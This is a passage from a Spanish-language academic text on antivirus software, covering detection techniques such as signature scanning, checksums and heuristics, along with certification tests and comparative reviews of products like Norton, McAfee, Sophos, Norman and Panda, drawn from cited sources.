desarrolladores de antivirus de scanning tuvieran tiempo de analizar el virus,
extraer el fragmento de código usado para la identificación y agregarlo a la base
de datos del programa para lanzar una nueva versión. Sin embargo, la
obsolescencia de este mecanismo de identificación como una solución antivirus
completa se encontró en su mismo modelo.

La primera debilidad de este sistema radica en que siempre brinda una solución a
posteriori: es necesario que un virus informático alcance un grado de dispersión
considerable para que sea enviado (por usuarios capacitados, especialistas o
distribuidores del producto) a los desarrolladores de antivirus. Estos lo analizarán,
extraerán el fragmento de código necesario, y lo incluirán en la próxima versión de

103
su programa antivirus. Este proceso puede tomar meses a partir del momento en
que el virus comienza a tener una dispersión considerable, tiempo en el que puede
causar graves daños sin que pueda ser identificado.

Además, este modelo consiste en una sucesión infinita de soluciones parciales y

momentáneas (cuya sumatoria jamás constituirá una solución definitiva), que
deben actualizarse periódicamente debido a la aparición de nuevos virus. En
síntesis, la técnica de scanning es altamente ineficiente, pero se sigue utilizando
debido a que permite identificar rápidamente la presencia de los virus más
conocidos.

En virtud del pronto agotamiento técnico de la técnica de scanning, los

desarrolladores de programas antivirus han dotado a sus creaciones con métodos
para búsquedas de virus informáticos (y de sus actividades), que no identifican
específicamente al virus sino a algunas de sus características generales y
comportamientos universalizados.

Este tipo de método rastrea rutinas de alteración de información que no puedan

ser controladas por el usuario, modificación de sectores críticos de las unidades
de almacenamiento (master boot record, boot sector, FAT, entre otras), etc.

Un ejemplo de este tipo de métodos es el que utiliza algoritmos heurísticos. De

hecho, esta naturaleza de procedimientos busca, de manera bastante eficiente,
códigos de instrucciones potencialmente nocivos. Resulta eficaz para la detección
de virus conocidos y es una de las soluciones utilizadas por los antivirus para la
detección de nuevos virus. El inconveniente que presenta este tipo de algoritmo
radica en que puede llegar a sospecharse de muchas cosas que no son virus.
Esto hace necesario que el usuario que lo utiliza conozca un poco acerca de la
estructura del sistema operativo, para poder identificar las falsas alarmas
generadas por el algoritmo heurístico. Algunos de los antivirus de esta clase son
F-Prot, Norton Anti Virus y Dr. Solomon's Toolkit.

Ahora bien, otra forma de detectar la presencia de un virus informático en un

sistema consiste en monitorear las actividades de la PC señalando si algún
proceso intenta modificar los sectores críticos de los dispositivos de
almacenamiento o los archivos ejecutables. Los programas que realizan esta tarea
se denominan chequeadores de integridad.

Sobre la base de estas consideraciones, podemos consignar que un buen sistema

antivirus debe estar compuesto por un programa detector de virus -que siempre
esté residente en memoria- y un programa que verifique la integridad de los
sectores críticos del disco rígido y sus archivos ejecutables. Existen productos
antivirus que cubren los dos aspectos, o bien pueden combinarse productos
diferentes configurados de forma que no se produzcan conflictos entre ellos.

104
8.2 ESTRUCTURA DEL PROGRAMA ANTIVIRUS

Para comprender el funcionamiento de un programa antivirus es necesario

estudiar los módulos que lo componen.

8.2.1 Módulo de identificación o de control. En este módulo se registran los

cambios realizados por un virus en los programas ejecutables o en áreas críticas
del disco duro, con este fin usa la técnica de verificación de integridad, de esta
forma se controla la información en el disco duro buscando prevenir que sea
modificada de acuerdo con los requerimientos del usuario únicamente.

En este módulo también se realiza la identificación del virus, para lo cual existen
varias técnicas como el scanning y los algoritmos heurísticos.

La identificación de código nocivo encuentra líneas de código incluidas en

programas que tengan como objetivo alterar la información del disco duro de
manera nociva. Para esto es necesario descompilar o desensamblar el programa.

La administración de recursos permite monitorear las rutinas de acceso a

hardware del equipo, de esta forma se limita en gran manera el campo de acción
de determinado programa limitando el uso de estos recursos para este programa
que ha sido identificado previamente como potencialmente nocivo. Es posible, por
ejemplo, impedir escribir o dar formato a ciertas áreas críticas del disco duro
(Montesino, 2003)44.

8.2.2 Módulo de respuesta. El antivirus reacciona con una alarma que consiste
en un aviso en la pantalla ante la presencia de un programa “sospechoso”. La
función reparar se utiliza como solución temporal para mantener el sistema
funcionando hasta implementar una solución más adecuada. Existen dos técnicas
para evitar la infección de ejecutables, la primera es evitar que se infecte todo el
programa y la segunda es limitar la infección a determinado ámbito. Los
problemas de implementación de la primera técnica evitan que sea una buena
opción a pesar de lo conveniente de su implementación.

8.3 TÉCNICAS PARA LA DETECCIÓN DE VIRUS INFORMÁTICOS

8.3.1 Scanning o rastreo. Fue la primera técnica que se popularizó para la

detección de virus informáticos, y que todavía se utiliza -aunque cada vez con
menos eficiencia. Consiste en revisar el código de todos los archivos ubicados en
la unidad de almacenamiento - fundamentalmente los archivos ejecutables - en
busca de pequeñas porciones de código que puedan pertenecer a un virus
informático.

105
La primera debilidad de este sistema radica en que al detectarse un nuevo virus,
este debe aislarse por el usuario y enviarse al fabricante de antivirus, la solución
siempre será a posteriori: es necesario que un virus informático se disperse
considerablemente para que se envíe a los fabricantes de antivirus. Estos lo
analizarán, extraerán el trozo de código que lo identifica y lo incluirán en la
próxima versión de su programa antivirus. Este proceso puede demorar meses a
partir del momento en que el virus comienza a tener una gran dispersión, lapso en
el que puede causar graves daños sin que pueda identificarse.

Otro problema es que los sistemas antivirus deben actualizarse periódicamente

debido a la aparición de nuevos virus. Sin embargo, esta técnica permite identificar
rápidamente la presencia de los virus más conocidos y, al ser estos los de mayor
dispersión, posibilita un alto índice de soluciones.
(Montesino, 2003)44.

8.3.2 Comprobación de suma o CRC (Ciclyc Redundant Check). Es otro

método de detección de virus. Mediante una operación matemática que abarca a
cada byte del archivo, generan un número (de 16 ó 32 bytes) para cada archivo.
Una vez obtenido este número, las posibilidades de que una modificación del
archivo alcance el mismo número son muy pocas. Por eso, es un método
tradicionalmente muy utilizado por los sistemas antivirus.

En esta técnica, se guarda, para cada directorio, un archivo con los CRC de cada
archivo y se comprueba periódicamente o al ejecutar cada programa. Los
programas de comprobación de suma, sin embargo, sólo pueden detectar una
infección después de que se produzca. Además, los virus más modernos, para
ocultarse, buscan los ficheros que generan los programas antivirus con estos
cálculos de tamaño. Una vez encontrados, los borran o modifican su información
(Montesino, 2003)44.

8.3.3 Programas de vigilancia. Ellos detectan actividades que podrían

realizarse típicamente por un virus, como la sobre escritura de ficheros o el
formateo del disco duro del sistema. En esta técnica, se establecen capas por las
que debe pasar cualquier orden de ejecución de un programa. Dentro del
caparazón de integridad, se efectúa automáticamente una comprobación de suma
y, si se detectan programas infectados, no se permite que se ejecuten (Montesino,
2003)44.

8.3.4 Búsqueda heurística. Las técnicas heurísticas nacen de la necesidad de

una “detección genérica” de los virus informáticos. Se llama detección genérica a
la posibilidad de detectar “cualquier virus” aún sin haberlo analizado antes y sin
estar en la base de datos del antivirus que se esté considerando. Esto pareciera
que carece de sentido pero es tan simple como buscar “instrucciones comunes” de
los virus para advertir de la posibilidad de que un archivo o programa esté
infectado.

106
Cuando analizamos las primeras instrucciones de cualquier archivo, veremos
instrucciones para detectar los parámetros de la línea de comandos, borrar la
pantalla, llamar a alguna función, ejecutar alguna macro, etc.. No obstante
tratándose de un virus suelen ser otras bien diferentes como activar el cuerpo del
virus o buscar más archivos para intentar implantarles su código.

La experiencia es sin duda lo que lleva a una persona a reconocer algo infectado
de algo limpio en cuestión de segundos. Esa “experiencia” se ha pretendido
introducir en los programas antivirus bajo el nombre de “heurística”.
El funcionamiento de la heurística es sencillo, primero se analiza cada programa
sospechoso sin ejecutar las instrucciones, lo que hace es desensamblar o
"descompilar" el código de máquina para deducir que haría el programa si se
ejecutara. Avisando que el programa tiene instrucciones para hacer algo que es
raro en un programa normal, pero que es común en un virus.

Sin duda el principal problema de las técnicas heurísticas ha sido los falsos
positivos. A pesar de que se han mejorado mucho en los últimos años, siguen sin
conseguir demasiada efectividad (aunque hay algunas excepciones). El problema
más que en la calidad de la rutina heurística está en la interpretación que el
usuario realice de ese aviso heurístico. Si es poco experimentado estará
constantemente mandando muestras a su casa de antivirus ya que “el antivirus le
dijo que podía tener un virus”.

Entendiendo la Heurística como un indicador de probabilidad de contagio, esto nos

lleva a considerarla como un sistema de detección mejorada que al incluirla los
antivirus nos permite establecer un sistema de alerta y de prevención ante la
aparición de mutaciones de virus o de nuevos virus.

Esta técnica permite "barrer" diferentes tipos de códigos dentro de los archivos,
que sean susceptibles de ser malignos. Códigos que son genéricos dentro de los
archivos maliciosos y que siempre suelen ser parecidos. O por lo menos respetar
parte de las cadenas de comandos que activan los virus.

Pero ¿cómo opera un antivirus? Los virus tienen patrones de códigos que son
como sus "huellas digitales". Los software antivirus buscan estos patrones, pero
sólo de los que tienen almacenados en su lista (por esto la actualización es tan
importante). Estos productos también pueden valerse de la heurística, es decir,
analizan los archivos para detectar comportamientos similares a los de los virus.

Cada día crece el número de nuevos virus y la alternativa para poder

neutralizarlos, sin haber programado antes el antivirus para su reconocimiento, es
la denominada “búsqueda heurística”. A través de ella, el programa antivirus
analiza el código de los programas buscando instrucciones, acciones sospechosas
o indicios que delaten la presencia de virus en la computadora, de acuerdo a los
patrones habituales empleados por los códigos maliciosos.

107
El método Heurístico es una tecnología de programación que dentro de sus rutinas
de detección de especies virales, incluye las cadenas clásicas que son similares,
parecidas o afines a virus auténticos. El método heurístico, si no está bien
programado, es susceptible de incurrir en resultados falsos positivos o negativos.
Además, al encontrar un virus desconocido, variante de otro existente, el antivirus
que emplea este método de búsqueda no podrá eliminar eficientemente el virus y
mucho menos reparar el archivo o área afectada.

Para que un antivirus detecte y elimine eficientemente a un virus así como también
repare los daños ocasionados, debe incluir en la base de datos de sus rutinas de
detección y eliminación el exacto micro código viral de esa especie. Sin embargo
la técnica de búsqueda heurística de virus por "familias" es una forma eficiente de
detectar a especies virales que pertenecen a una misma familia, aunque no es un
método absolutamente exacto o eficiente.
(Pérez, 2005)58.

Con esta técnica, se desensambla el programa y se ejecuta paso a paso, a veces

mediante la propia CPU. De ese modo, el programa antivirus averigua qué hace
exactamente el programa en estudio y realiza las acciones oportunas. En general,
es una buena técnica si se implementa bien, aunque el defecto más importante es
la generación de falsas alarmas, que no se tiene la certeza de que un programa
sea un virus en función de su comportamiento. La mayoría de los virus nuevos
evitan directamente la búsqueda heurística modificando los algoritmos, hasta que
el programa antivirus no es capaz de identificarlos (Montesino, 2003)44.

8.4 EVALUACION DE SOFTWARE ANTIVIRUS

La expresión “cuál es el mejor antivirus”, puede variar de un usuario a otro. Es

evidente que para un usuario inexperto el término define casi con seguridad al
software que es más fácil de instalar y utilizar, algo totalmente intranscendente
para usuarios expertos, administradores de redes, etc.

No se puede afirmar que exista un solo sistema antivirus que presente todas las
características necesarias para la protección total de las computadoras; algunos
fallan en unos aspectos, otros tienen determinados problemas o carecen de
ciertas facilidades. De acuerdo con los diferentes autores consultados, las
características esenciales son las siguientes:

Gran capacidad de detección y de reacción ante un nuevo virus.

Actualización sistemática.
Detección mínima de falsos positivos o falsos virus.
Respeto por el rendimiento o desempeño normal de los equipos.
Integración perfecta con el programa de correo electrónico.
Alerta sobre una posible infección por las distintas vías de entrada (Internet, correo
electrónico, red o discos flexibles).

108
Gran capacidad de desinfección.
Presencia de distintos métodos de detección y análisis.
Chequeo del arranque y posibles cambios en el registro de las aplicaciones.
Creación de discos de emergencia o de rescate.
Disposición de un equipo de soporte técnico capaz de responder en un tiempo
mínimo (ejemplo 48 horas) para orientar al usuario en caso de infección.

Existen sistemas antivirus que tienen además, la característica de trabajar

directamente en redes LAN y WAN, así como en servidores proxy.

Ante la masiva proliferación, tanto de virus como de productos dirigidos a su

tratamiento, existe la necesidad de que algún organismo reconocido de carácter
internacional certifique los productos antivirus y asegure su correcto rendimiento.

En un antivirus lo más importante es la detección del virus y, al estudio de tal fin se

dedican asociaciones como la ICSA (International Computer Security
Association) - anteriormente la NCSA - y la Checkmark. Ambas siguen
procedimientos similares. En concreto, para que la ICSA certifique un producto
antivirus, ha de ser capaz de detectar el 100 % de los virus incluidos en la Wildlist
(lista de virus considerados en circulación) y, al menos, un 90 % de la Zoolist -una
colección de varios miles de virus no tan difundidos.

La certificación de un producto se realiza cuatro veces al año, sin el conocimiento

del fabricante y con una versión totalmente comercial, con lo que se asegura que
la versión que se certifica es la que recibe directamente el usuario y no una
especialmente preparada para la prueba (Montesino, 2003)44.

8.4.1 Pruebas de antivirus de mayor aceptación. A continuación se describen

brevemente algunas de los tests de antivirus mas aceptados a nivel mundial.

Certificación ICSA. La ICSA (Internacional Computer Security

Association) ha estado realizando pruebas de software antivirus desde 1992;
muchos productos populares son sometidos a sus varios esquemas de
certificación (ICSA). El Scanning al momento del acceso y por solicitud son parte
de su siempre creciente criterio de certificación; el criterio para remoción de virus
fue agregado en julio de 1999.

Los tests de detección primaria se dividen en dos secciones: la detección de virus

en the Wild , y la detección de virus en el zoo. La lista zoo mantenida por el
personal de ICSA es grande y completa; los productos deben detectar al menos el
90% de estos virus. Los tests de los virus en the Wild ahora usan muestras que
han sido replicadas del set de muestras de The Wildlist Organization´s
Wildcore. Estos virus han sido confirmados como amenaza activa para los
usuarios.

109
Para ser certificados por la ICSA, los productos deben detectar el 100% de estos
virus, usando la versión de The Wildlist que haya sido lanzada un mes antes de la
fecha de la prueba. Adicionalmente un criterio de “Infecciones Comunes” asegura
que cualquier virus que la ICSA considere importante se debe tratar en la forma en
que la ICSA considera apropiada. El test de falsas alarmas fue adicionado en
1999.

Westcoast Labs Checkmark. Westcoast Publishing se estableció como

lider mundial en la prueba y certificación de software antivirus a mediados de los
noventa con su introducción de el Westcoast Labs Checkmark. Los criteros de
prueba dependen del nivel de certificación para el que se aplique.

El nivel uno mide la habilidad del producto evaluado para detectar todos los virus
en The Wild, usando muestras basadas en la edición de la WildList de no menos
de dos meses antes del lanzamiento del producto.

En el nivel dos los productos también tienen que desinfectar esos virus. Además
las pruebas de nivel dos usan la versión de la WildList que haya sido publicada
un mes antes del lanzamiento del producto.

Ambas pruebas son llevadas a cabo usando virus replicados por West Coast,
midiendo asi la habilidad de los productos para detectar virus que constituyen la
amenaza real. Muchos productos populares son sometidos a este esquema de
prueba. Los productos certificados son anunciados regularmente.

Prueba VTC Malware de la Universidad de Hamburg. Bajo la

supervisión del experto en seguridad y antivirus Dr Klaus Brunnstein, los
estudiantes del VTC (Virus Test Center) de la Universidad de Hamburg han
estado diseñando y realizando pruebas de software antivirus desde 1994. Los
resultados de estos proyectos se distribuyen gratuitamente al publico en general.
Esas pruebas han evolucionado desde simples pruebas de detección de virus de
booteo y de archivos en 1994 hasta las actuales pruebas de virus (y malware).
En adición a su gran colección Zoo, a principios de 1999, el VTC empezó a usar
ejemplos copiados de la colección de virus en The Wild de la WildList
Organization en sus pruebas, asegurando de esta manera una representación
acertada de la habilidad del producto para enfrentar una amenaza real de estos
virus.

Universidad de Magdeberg. Andreas Marx y sus proyectos de prueba de

antivirus para el ATC (Antivirus Test Center) de la Universidad de Magdeberg,
hechos en cooperación con GECA Software & Medienservice, son relativamente
nuevos en el área de la evaluación de antivirus. Las pruebas, patrocinadas por
compañías de antivirus, proveen resultados a revistas como CHIP, FreeX,
Network World, PC Shopping y PC welt; los resultados de estas pruebas han
sido incluidos en las reseñas que han publicado.

110
De acuerdo a Marx, la mayoría de los criterios de prueba han sido escogidos por
administradores de redes, usuarios, revistas, Compañías AV y la Universidad.
Estos criterios incluyen detección de virus en The Wild, y desinfección. Los
resultados son publicados en inglés y en alemán.

Virus Bulletin. El VB ha estado probando productos antivirus desde que la

publicación comenzó en 1989. Los productos para las varias plataformas son
revisados regularmente en las Reseñas Comparativas del VB, las cuales prueban
los productos con una colección Zoo (Infecciones de archivos estándar de DOS y
Windows, virus macro y virus polimorficos) así como también con un grupo de
virus en The Wild. Para cada comparativa, el grupo de virus en The Wild del
Virus Bulletin está basado en una versión del WildList anunciada
aproximadamente dos semanas antes de la fecha límite de entrega del producto
(Gordon, 2005)30.

8.4.2 Por qué los sistemas de evaluación de antivirus deben evolucionar.

Dado que las pruebas de antivirus han mejorado dramáticamente durante los
últimos años a medida que la comunidad evaluadora se vuelve más experta, la
necesidad de tener pruebas más completas no se ve muy claramente, en esta
sección se examinaran las razones por las que las pruebas deben pasar al
siguiente nivel.

La introducción y desarrollo del WildList como criterio de prueba proporcionó el

grado de realismo adecuado a la industria de los antivirus. Con este criterio, los
usuarios tienen ahora una idea mínima de lo que cualquier antivirus competente (y
apropiadamente actualizado) debería detectar. Este criterio es la piedra angular
de las pruebas importantes de antivirus. De hecho, algunos de los agentes que
ejecutan estas pruebas se han cambiado a un WildList mensual, que permite
mostrar a los usuarios la habilidad de los productos para responder a la siempre-
cambiante amenaza. Sin embargo, El incremento de amenazas de virus de
rápida propagación como Melissa y LoveBug, resalta la necesidad de un cambio
más complejo de enfoque en los ambientes de prueba.

La industria de pruebas también ha avanzado con varias evaluaciones

relacionadas con la desinfección, y el desempeño de scanners activados en el
momento de acceso. La certificación VB100% ofrecida por el Virus Bulletin
recientemente adicionó pruebas “de acceso” a su lista de criterios de evaluación
de los antivirus; ICSA y WestCoast Labs han implementado recientemente
pruebas de desinfección. Es claro que las pruebas siguen avanzando a medida
que la industria madura. Sin embargo, la sola expansión no es suficiente. En la
medida que los productos se vuelven más complejos, se requieren pruebas más
complejas. Esto inmediatamente representa un aumento en los costos, por lo tanto
es importante expandir la tecnología de prueba en las áreas que son mas
importantes para la protección del usuario, usando las métricas más importantes
para los usuarios y los desarrolladores (Gordon, 2005)30.

111
8.5 VALORACIÓN DE DIFERENTES CLASES DE SOFTWARE ANTIVIRUS

8.5.1 Norton Antivirus. Este antivirus posee una protección automática en

segundo plano. Detiene prácticamente todos los virus conocidos y desconocidos,
mediante una tecnología propia, denominada NOVI, que implica el control de las
actividades típicas de un virus. Protege la integridad del sistema, actúa antes de
que causen algún daño o pérdida de información, con una amplia línea de
defensa, que combina búsqueda, detección de virus e inoculación.

Utiliza diagnósticos propios para prevenir infecciones en sus propios archivos y de

archivos comprimidos. El rastreo puede realizarse manual o automáticamente a
partir de la planificación de la fecha y la hora. También, posibilita reparar los
archivos infectados por virus desconocidos. Incluye información sobre muchos de
los virus que detecta y permite establecer una contraseña para aumentar así la
seguridad.

La lista de virus conocidos puede actualizarse periódicamente (sin cargo)

mediante servicios en línea como Internet, América On Line, Compuserve, The
Microsoft Network o el BBS propio de Symantec, entre otros (Manson, 2005)39.

Entre las características destacables del Norton Antivirus se encuentra la opción

LiveUpdate que automatiza la actualización del motor y de las nuevas
definiciones de virus de forma simultánea por Internet. Con la compra del
producto, se obtiene Soporte Gold durante un año, que integra línea gratuita de
soporte help-desk y actualizaciones de firmas (Hispasec, 2005)33.

El menú principal se divide en estado del sistema, estado de correo electrónico,

búsqueda de virus, un apartado de informes y un módulo de programación para
planificar tareas. Cabe destacar la existencia de un módulo para el análisis de los
correo que entran, así como las opciones cuarentena y soporte de muestras
sospechosas con el mismo programa.

En las pruebas, Norton se ha mostrado débil en la detección de Troyanos y

backdoors, indicador que aun se agrava más en el apartado de muestras de la
colección Internet. En el resto de las pruebas, aparece en un nivel medio, que
decae de nuevo en el apartado de formatos de compresión o en la prueba de
instalación en un sistema con virus. Destaca de forma especial en la prueba de
detección en correo, donde es la mejor solución de las probadas. En un producto
tan integrado en Internet, resulta atrayente la falta de una protección específica a
nivel del navegador (Montesino, 2003)44.

Los resultados de este análisis con respecto al Norton Antivirus presentan

algunas contradicciones con los publicados en otro por la revista PC World.
Norton es el que mejores resultados ha ofrecido en las pruebas.

112
Tal vez, demora algo más en completar el proceso de análisis, pero detectó el 100
% de los virus utilizados, con un porcentaje muy bajo de falsos positivos
(Contreras, 2005)14.

La interfaz de usuario es muy buena, muy sencilla y fácil de utilizar. Desde un

único programa se controlan todas las funciones, sin escatimar información.
Aunque se puede llamar independientemente al módulo de actualización de
nuevas versiones, también puede hacerse desde un icono en la pantalla principal.

Después de un proceso de instalación algo tedioso, y que realiza un primer

análisis exhaustivo de todos los ficheros, el sistema queda configurado con todas
las opciones de análisis activadas. Además de mantener activado el análisis
heurístico, también queda activado el escáner manual sobre todo tipo de ficheros,
y es precisamente esta la causa de la tardanza en el análisis inicial.

El número de opciones que pueden configurarse es muy elevado, y el proceso es

simple. El centro de desinfección de Symantec, llamado SARC (Symantec Anti
Virus Research Center), recibe los ficheros infectados y, según los distribuidores,
es cuestión de horas, obtener una respuesta con un fichero limpio y una nueva
actualización. Por otra parte, Norton Antivirus reconoce perfectamente las
cuentas de correo que se utilizan y permite protegerlas individualmente. Además,
pueden configurarse alertas para enviar un mensaje a otras cuentas de correo o a
otro usuario de la red.

Finalmente, la actualización de nuevas versiones es un claro ejemplo de

simplicidad. No hace falta conectarse a un sitio web y seleccionar cómo queremos
actualizar el producto. Lo único que se debe hacer es clic sobre el icono de
LiveUpdate y el programa se conecta a Internet y se actualiza automáticamente.
Además, la licencia no está limitada en tiempo. Symantec ofrece actualizaciones
de por vida (Montesino, 2003)44.

8.5.2 McAFEE VIRUS SCAN. Es uno de los más famosos. Trabaja por el
sistema de escaneo descrito anteriormente, y es el mejor en su estilo. Para
escanear, hace uso de dos técnicas propias: CMS (Code Matrix Scanning,
Escaneo de Matriz de Código) y CTS (Code Trace Scanning, Escaneo de
Seguimiento de Código) (Manson, 2003)39.

Una de las principales ventajas de este antivirus es que la actualización de las

bases de datos de strings es muy fácil de realizar. Ello, sumado a su condición de
programa shareware, lo coloca al alcance de cualquier usuario. Es bastante
flexible en cuanto a la configuración de cómo detectar, reportar y eliminar virus.

McAfee VirusScan es uno de los clásicos entre los productos antivirus y suele
ocupar siempre los puestos punteros en sus estudios. La compañía Network
Associates adquirió McAfee y el doctor Solomons integró este producto con

113
nuevas tecnologías para analizar los protocolos de Internet, de forma que el
módulo VShield permite analizar el tráfico con los navegadores Netscape
Navigator e Internet Explorer, así como con los clientes de Outlook Express,
Eudora, Netscape Mail, Microsoft Exchange, Outlook y Lotus cc:Mail
(Hispasec,2001)33.

VirusScan se presenta actualmente con una nueva interfaz algo más futurista,
con una imagen que huye de las típicas aplicaciones Windows, donde, sin
embargo falta la extrema sencillez y claridad de la anterior interfaz minimalista,
basada en pestañas. En lo que a opciones se refiere, además del menú de
exploración, se encuentra un planificador de tareas y una sección de cuarentena
que permite aislar los archivos infectados y sospechosos y enviarlos de forma
automática a los laboratorios AVERT para su análisis.

En las pruebas, sin llegar a destacarse de forma especial, se comporta de forma

adecuada, tanto a nivel de detección como heurístico, y en el resto de pruebas se
sitúa en un punto intermedio. No se ha encontrado mejora significativa alguna en
el motor con respecto a otros años, sigue entre los antivirus que menos formatos
de compresión soporta. En definitiva, nueva cara para VirusScan y opciones
adicionales, si bien se encuentra algo estancado en la tecnología de su motor
antivirus donde otros productos han realizado avances significativos (Montesino,
2005)44.

McAfee VirusScan es el antivirus más extendido mundialmente.

Anuncia en su publicidad que se han vendido más de 70 millones de copias,

seguido del Norton Antivirus.

Es, curiosamente, el programa antivirus seleccionado por Microsoft para utilizarlo

dentro de su webmail hotmail.com (Contreras, 2005)14.

En su nueva versión ofrece una interfaz nada convencional; sin embargo, incluye
los controles en el menú del botón derecho del ratón, para seleccionar los ficheros
que se desean revisar. También mantiene dos iconos pequeños en la esquina
derecha de la barra de tareas. La interfaz de usuario no se ajusta a los estándares
actuales de ventanas, produce cierta confusión en su uso.

Los resultados de las pruebas no fueron muy buenos. Fue capaz de detectar el 94
% de los virus y sólo presentó un 3 % de falsos positivos. En los virus del tipo
macro, la desinfección fue muy satisfactoria, al conservarse las macros operativas.
El factor más desfavorable en su evaluación fue en la detección en correo. En
algunos casos, cuando se adjuntó un fichero infectado con virus a un mensaje, el
programa lo detectó hasta que se guardó en el disco.

114
La documentación sobre los virus no se encuentra en el CD, sino que es necesario
estar conectado a Internet para poder acceder a ella. Esto supone un problema
para cualquier usuario de un equipo que no esté conectado a Internet. Por otra
parte, McAfee ofrece un servicio de desinfección para nuevos virus, también a
partir de una conexión a Internet. Puede enviarse un fichero en formato
comprimido y McAfee se compromete a limpiarlo y devolverlo en cuestión de
horas desde los laboratorios AVERT Labs. Mientras tanto, puede colocarse en
cuarentena, para evitar su difusión a otros equipos.

Las actualizaciones del escáner y del fichero de patrones se hacen también por
Internet. Se puede configurar la interfaz para arrancar una actualización al hacer
clic con el botón derecho del ratón. Las actualizaciones pueden hacerse de por
vida. El resto de los servicios son de carácter indefinido. Es el programa más
económico de la esta comparación (Montesino, 2005)44.

8.5.3 Sophos. Con centro en Reino Unido, es uno de los fabricantes de antivirus
que más se destaca por su especialización en entornos corporativos y por la
cantidad de plataformas que soporta. Junto con el software, el usuario adquiere el
servicio de actualizaciones periódicas, alertas y emergencias técnicas vía correo
electrónico y soporte por teléfono e Internet. Nada más activar Sophos, se accede
a una sencilla interfaz. Mediante tres pestañas, puede accederse a la exploración
inmediata, a la agenda para planificar tareas y, por último, a la configuración de
InterCheck, el módulo residente. En la barra de herramientas, pueden iniciarse las
exploraciones o detenerlas, entrar en el apartado de configuración, alarmas y
diccionario de virus. Incluye una relación de todos los virus detectados, con sus
propiedades.

Si bien este software ofrece un nivel de soporte alto, se trata sin duda del peor
producto antivirus de los evaluados en el aspecto técnico. Además de ser uno de
los productos que obtiene los índices más bajos de detección, es el único que no
es capaz de desinfectar ejecutables, una opción que hoy por hoy no se concibe en
antivirus profesionales. En su lugar, este antivirus recomienda que se eliminen los
ficheros afectados y que se reemplace por una copia limpia (Hispasec, 2005)33.

La interfaz de usuario no es intuitiva, el simple hecho de analizar un directorio

obliga a adentrarse en la opción de configuración, y marcar exactamente los tipos
de fichero que se desea analizar, porque las opciones de análisis de ficheros
comprimidos aparecen deshabilitadas. La configuración del escáner es compleja,
obliga a editar un fichero de configuración, algo que nunca podrá hacer un usuario
“no experto”. Sin embargo, en las pruebas, ha obtenido resultados muy buenos.
Sólo necesita 3 MB de espacio en disco, porque el resto de la documentación la
mantiene en el CD. Las funciones de soporte de programas de correo son escasas
y el servicio de actualización no está integrado en el programa (Contreras, 2005)14.

115
La principal ventaja de Sophos es su capacidad para trabajar en distintos
entornos, como Lotus Notes, Exchange, Novell, etc. Esto lo convierte en una
seria opción para sistemas hetereogéneos.

8.5.4 Norman Virus Control. La Norman Data Defense es su productora. Hace

unos años se integró con ThunderByte, uno de los antivirus míticos de la época
MS-DOS por el uso de técnicas heurísticas. En Norman Virus Control 5.0, la
interfaz se renovó completamente, con una filosofía basada en tareas, módulo de
cuarentena y con la posibilidad de actualizar las firmas de virus desde el mismo
programa por Internet, como mejoras más relevantes a primera vista en
comparación con las versiones anteriores.

En las pruebas se ha comportado con un nivel medio en general. Se destacó en

pruebas como la de soporte telefónico y obtuvo los peores resultados en la
consulta por Internet. En la parte técnica, fue muy eficiente en la prueba de
instalación en un sistema infectado, donde ha compartido el primer puesto junto
con AVP. Sin embargo, carece de una heurística efectiva para los nuevos
formatos y módulos de protección específicos para Internet y requiere mejoras en
el soporte de formatos de compresión (Hispasec, 2005)33.

La interfaz de Norman es interesante. Permite una configuración muy extensa en

cuanto a número de opciones. Esto es muy beneficioso para un usuario avanzado,
pero puede resultar un poco confuso para un principiante. La versión que se
comercializa actualmente se encuentra en inglés (Contreras, 2005)14.

Al igual que ocurre con el programa de McAfee, se presenta un icono en la

esquina derecha de la barra de tareas, con el que puede accederse a un menú
desde el que es posible lanzar todas las funciones.

El producto ha obtenido un porcentaje de aciertos del 93 %, bastante elevado. El

número de falsos positivos fue del 15 %, con el que clasifica en un lugar mucho
más bajo que el resto de productos en este aspecto. Los mejores resultados de
Norman fueron en el tratamiento y la detección de virus de tipo macro. El factor
más negativo en la evaluación del producto es la falta de integración con Outlook,
que obliga a escanear manualmente cada uno de los ficheros que se recibe.

El producto se divide en siete programas distintos. Esto dificulta sensiblemente su

uso, porque el usuario tiene que saber para qué se utiliza cada uno y seleccionarlo
cuando lo crea oportuno. No es fácil saber cuándo se está infectado y, por eso,
tampoco lo es, decidir si utilizar un programa de análisis específico sobre un
fichero. El programa principal es el que se emplea para hacer el análisis manual
de los ficheros. También se puede acceder desde este programa a la
configuración de cada una de las opciones.

116
Existen otros programas, como Smart Behavior Blocker, cuya misión es la de
analizar el comportamiento de algún programa posiblemente infectado.
Este programa debería integrarse en la interfaz principal, para que el usuario no se
vea obligado a averiguar para qué sirve y cómo tiene que utilizarlo.

El sistema de ayuda también se encuentra íntegramente en Internet. De hecho, si

se selecciona la opción de ayuda, se obtiene una página HTML desde la que es
posible bajar de Internet todos los manuales del producto en formato PDF.
El control que ofrece Norman Virus Control es superior al resto de los programas
probados. Además de permitir configurar el programa con una mayor cantidad de
opciones, y de incluir programas específicos para analizar virus de tipo Troyano,
también puede incluso seleccionarse fragmentos de código que nos interese que
el programa no entre a analizar.

El costo del programa es razonable, y su licencia se renueva anualmente. El

laboratorio de desinfección está en Noruega y el envío del programa infectado
también se realiza mediante la página web de Norman (Montesino, 2005)44.

8.5.5 Panda Platinum. Panda Software, muy popular en España, lucha fuerte
por imponerse a nivel internacional con un producto avanzado y una nueva
concepción de servicios añadidos. Con la adquisición de su producto, el usuario
obtiene durante un año soporte telefónico 24 horas x 365 días, servicio de
desinfección de virus nuevos en 24 horas, actualizaciones diarias del fichero de
firmas, así como del software de la aplicación.

A primera vista, Panda Platinum conserva la misma interfaz que se destaca por
ser similar en su concepción a la de Outlook, sus componentes multimedia, y su
integración en los clientes de correo. Uno de los cambios más significativos
experimentados por ella no se puede observar a simple vista, y se encuentra en
un renovado interior para integrarse de lleno con las nuevas especificaciones de
Windows.

Es la única solución con soporte telefónico real 24 x 365. En el resto de pruebas

de soporte y respuesta ante un virus nuevo también destaca con respecto a la
media obtenida por los productos evaluados. Si bien este año, en relación a
comparaciones anteriores, lo más sorprendente son sus resultados en las pruebas
de detección con unos indicadores, donde destaca, en especial, un primer puesto
en la colección de Troyanos y backdoors. También es una de las pocas
soluciones que contempla módulos específicos para Internet con análisis a nivel
de los diferentes protocolos, incluido el web, correo entrante y saliente, ftp y
noticias. Sin embargo, se ha visto algo empañado en la prueba de correo al no
soportar la desinfección en Outlook Express. Otro punto a mejorar es el soporte
de compresores de ejecutables (Hispasec, 2005)33.

117
